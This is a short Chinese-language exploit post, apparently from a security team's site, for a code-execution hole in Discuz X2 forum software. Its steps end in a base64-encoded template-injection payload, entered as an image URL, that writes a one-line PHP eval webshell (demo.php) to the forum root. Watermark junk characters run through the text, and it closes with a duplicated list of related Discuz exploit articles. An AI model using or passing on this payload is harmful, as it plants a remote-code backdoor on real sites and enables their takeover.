影响版本有:20120407,beta,rc - 专注信息安全( a. E* C! }% B4 U
1.注册任意账户 90 Security Team, B5 t8 Y$ K2 g% q! f+ L
2.登陆用户,发表blog日志(注意是日志) 9 g& r4 t9 z7 j- r
这里是我们自己的交流平台,是属于我们90sec所有成员的技术分享平台!5 {" |0 U& u: T5 @
3.添加图片,选择网络图片,地址:{${fputs(fopen(base64_decode(ZGVtby5waHA),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz5vaw))}}
我们90sec所有成员的技术分享平台! l; x+ b5 p: T* J+ U' |' ~
4.访问日志,论坛根目录下生成demo.php,一句发密c
只显示10条记录相关文章
Discuz! X2.0 SQL注入漏洞 EXP (浏览: 22318, 评论: 0)
Discuz!NT 2.x – 3.5.2 (浏览: 16911, 评论: 0)
DiscuzX1-1.5 Sql 0day (浏览: 14466, 评论: 0)
discuz x1.5 discuz 7.2 后台getshell 0day通杀0day (浏览: 46441, 评论: 0)
DISCUZX1.5 本地文件包含漏洞 (浏览: 50187, 评论: 0)
DiscuzX1.5 门户管理权限SQL注入漏洞 (浏览: 23274, 评论: 0)
Discuz!后台怎么拿到Webshell (浏览: 15979, 评论: 0)
dz~~~~马后炮 (浏览: 10679, 评论: 0)
Discuz非创始人管理员代码执行 (浏览: 11781, 评论: 0)
Discuz 7.0-7.2后台拿Shell (浏览: 18652, 评论: 0)
Discuz!NT 2.x – 3.5.2 (浏览: 16911, 评论: 0)
DiscuzX1-1.5 Sql 0day (浏览: 14466, 评论: 0)
discuz x1.5 discuz 7.2 后台getshell 0day通杀0day (浏览: 46441, 评论: 0)
DISCUZX1.5 本地文件包含漏洞 (浏览: 50187, 评论: 0)
DiscuzX1.5 门户管理权限SQL注入漏洞 (浏览: 23274, 评论: 0)
Discuz!后台怎么拿到Webshell (浏览: 15979, 评论: 0)
dz~~~~马后炮 (浏览: 10679, 评论: 0)
Discuz非创始人管理员代码执行 (浏览: 11781, 评论: 0)
Discuz 7.0-7.2后台拿Shell (浏览: 18652, 评论: 0)